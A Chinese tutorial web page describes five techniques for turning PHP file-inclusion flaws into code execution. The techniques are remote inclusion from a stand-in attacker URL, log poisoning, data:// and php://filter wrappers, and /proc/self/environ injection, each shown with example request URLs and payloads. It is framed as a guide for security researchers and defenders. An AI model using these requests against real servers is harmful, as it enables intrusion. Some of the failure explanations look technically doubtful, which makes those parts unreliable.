当前位置:首页 > 文章列表 > 文章 > php教程 > 文件包含触发PHP代码执行方法

文件包含触发PHP代码执行方法

2026-04-01 19:37:36 0浏览 收藏
本文深入解析了文件包含漏洞触发PHP代码执行的五种核心利用手法:从需特定PHP配置支持的远程文件包含(RFI)和依赖日志注入的本地文件包含(LFI),到绕过文件系统限制的data://协议与php://filter封装器技巧,再到利用Linux环境变量文件/proc/self/environ在CGI模式下的隐蔽执行——每种方法均结合真实攻击链、关键前提条件与典型绕过思路,为安全研究人员和开发者提供了兼具实战性与深度的技术指南,助你快速识别、验证并防御这一高危漏洞。

文件包含如何触发php代码执行_文件包含触发php代码执行方法【注意】

如果您在Web应用中发现存在文件包含漏洞,攻击者可能利用该漏洞加载并执行恶意PHP代码。以下是触发PHP代码执行的多种方法:

一、利用远程文件包含(RFI)加载外部PHP脚本

当目标服务器启用了allow_url_fopen或allow_url_include配置时,可通过URL参数引入远程托管的PHP代码并执行。

1、构造包含远程PHP文件的请求,例如:http://target.com/vuln.php?page=http://attacker.com/shell.php

2、确保远程服务器返回的内容为合法PHP代码,且无HTTP头干扰(如使用text/plain响应头可能导致解析失败)

3、确认目标PHP配置中allow_url_include=Onallow_url_fopen=On

二、利用本地文件包含(LFI)配合日志文件注入执行PHP

当无法直接远程包含时,可将PHP代码写入服务器可访问的日志文件(如Apache access.log),再通过LFI包含该日志文件以触发执行。

1、向目标站点发送含PHP代码的恶意请求,例如:curl -v "http://target.com/?"

2、确定Web服务器日志路径(常见为/var/log/apache2/access.log或/var/log/nginx/access.log)

3、发起LFI请求包含日志文件:http://target.com/vuln.php?page=/var/log/apache2/access.log

4、确保日志内容被当作PHP代码解析,需满足log文件扩展名被PHP处理器识别(如配置了.log为PHP类型)或使用PHP封装器

三、利用PHP封装器data://协议直接注入代码

data://封装器允许在请求中内联传输数据,若目标PHP版本支持且未禁用该封装器,可绕过文件系统限制直接执行PHP代码。

1、构造base64编码的PHP代码,例如: 编码后为PD9waHAgZWNobyAndGVzdCc7ID8+Cg==

2、构造请求:http://target.com/vuln.php?page=data://text/plain;base64,PD9waHAgZWNobyAndGVzdCc7ID8+Cg==

3、若页面输出test,则说明成功;失败可能因disable_functions中禁用了base64_decode或data://被open_basedir限制

四、利用php://filter读取并解码PHP源码后触发执行

php://filter可用于在读取文件时应用过滤器,结合base64-encode可绕过简单内容检测,并在特定条件下实现代码执行(如配合eval等动态执行函数)。

1、确认目标存在可控制输入点并最终传递给eval()、assert()或create_function()等函数

2、构造payload:?input=php://filter/convert.base64-encode/resource=vuln.php

3、解码返回的base64内容,提取其中可利用的动态执行逻辑

4、构造二次请求,使解码后的PHP代码进入执行上下文,例如:assert(base64_decode("ZWNobyAnaGVsbG8nOw=="))

五、利用/proc/self/environ注入并包含环境变量

在CGI或某些FastCGI配置下,用户可控的HTTP头(如User-Agent)会被写入/proc/self/environ,该文件可被包含并执行其中的PHP代码。

1、发送带PHP代码的User-Agent头:User-Agent:

2、尝试包含环境变量文件:http://target.com/vuln.php?page=/proc/self/environ

3、观察响应是否执行了system命令;失败原因可能为/proc/sys/kernel/yama/ptrace_scope限制或Web服务器非CGI模式运行

今天关于《文件包含触发PHP代码执行方法》的内容介绍就到此结束,如果有什么疑问或者建议,可以在golang学习网公众号下多多回复交流;文中若有不正之处,也希望回复留言以告知!

宝塔安装Docker环境,容器部署应用教程宝塔安装Docker环境,容器部署应用教程
上一篇
宝塔安装Docker环境,容器部署应用教程
Python类继承怎么实现?有什么优势?
下一篇
Python类继承怎么实现?有什么优势?
查看更多
最新文章
资料下载
查看更多
课程推荐
  • 前端进阶之JavaScript设计模式
    前端进阶之JavaScript设计模式
    设计模式是开发人员在软件开发过程中面临一般问题时的解决方案,代表了最佳的实践。本课程的主打内容包括JS常见设计模式以及具体应用场景,打造一站式知识长龙服务,适合有JS基础的同学学习。
    543次学习
  • GO语言核心编程课程
    GO语言核心编程课程
    本课程采用真实案例,全面具体可落地,从理论到实践,一步一步将GO核心编程技术、编程思想、底层实现融会贯通,使学习者贴近时代脉搏,做IT互联网时代的弄潮儿。
    516次学习
  • 简单聊聊mysql8与网络通信
    简单聊聊mysql8与网络通信
    如有问题加微信:Le-studyg;在课程中,我们将首先介绍MySQL8的新特性,包括性能优化、安全增强、新数据类型等,帮助学生快速熟悉MySQL8的最新功能。接着,我们将深入解析MySQL的网络通信机制,包括协议、连接管理、数据传输等,让
    500次学习
  • JavaScript正则表达式基础与实战
    JavaScript正则表达式基础与实战
    在任何一门编程语言中,正则表达式,都是一项重要的知识,它提供了高效的字符串匹配与捕获机制,可以极大的简化程序设计。
    487次学习
  • 从零制作响应式网站—Grid布局
    从零制作响应式网站—Grid布局
    本系列教程将展示从零制作一个假想的网络科技公司官网,分为导航,轮播,关于我们,成功案例,服务流程,团队介绍,数据部分,公司动态,底部信息等内容区块。网站整体采用CSSGrid布局,支持响应式,有流畅过渡和展现动画。
    485次学习
查看更多
AI推荐
  • ChatExcel酷表:告别Excel难题,北大团队AI助手助您轻松处理数据
    ChatExcel酷表
    ChatExcel酷表是由北京大学团队打造的Excel聊天机器人,用自然语言操控表格,简化数据处理,告别繁琐操作,提升工作效率!适用于学生、上班族及政府人员。
    4226次使用
  • Any绘本:开源免费AI绘本创作工具深度解析
    Any绘本
    探索Any绘本(anypicturebook.com/zh),一款开源免费的AI绘本创作工具,基于Google Gemini与Flux AI模型,让您轻松创作个性化绘本。适用于家庭、教育、创作等多种场景,零门槛,高自由度,技术透明,本地可控。
    4585次使用
  • 可赞AI:AI驱动办公可视化智能工具,一键高效生成文档图表脑图
    可赞AI
    可赞AI,AI驱动的办公可视化智能工具,助您轻松实现文本与可视化元素高效转化。无论是智能文档生成、多格式文本解析,还是一键生成专业图表、脑图、知识卡片,可赞AI都能让信息处理更清晰高效。覆盖数据汇报、会议纪要、内容营销等全场景,大幅提升办公效率,降低专业门槛,是您提升工作效率的得力助手。
    4465次使用
  • 星月写作:AI网文创作神器,助力爆款小说速成
    星月写作
    星月写作是国内首款聚焦中文网络小说创作的AI辅助工具,解决网文作者从构思到变现的全流程痛点。AI扫榜、专属模板、全链路适配,助力新人快速上手,资深作者效率倍增。
    6124次使用
  • MagicLight.ai:叙事驱动AI动画视频创作平台 | 高效生成专业级故事动画
    MagicLight
    MagicLight.ai是全球首款叙事驱动型AI动画视频创作平台,专注于解决从故事想法到完整动画的全流程痛点。它通过自研AI模型,保障角色、风格、场景高度一致性,让零动画经验者也能高效产出专业级叙事内容。广泛适用于独立创作者、动画工作室、教育机构及企业营销,助您轻松实现创意落地与商业化。
    4837次使用
微信登录更方便
  • 密码登录
  • 注册账号
登录即同意 用户协议隐私政策
返回登录
  • 重置密码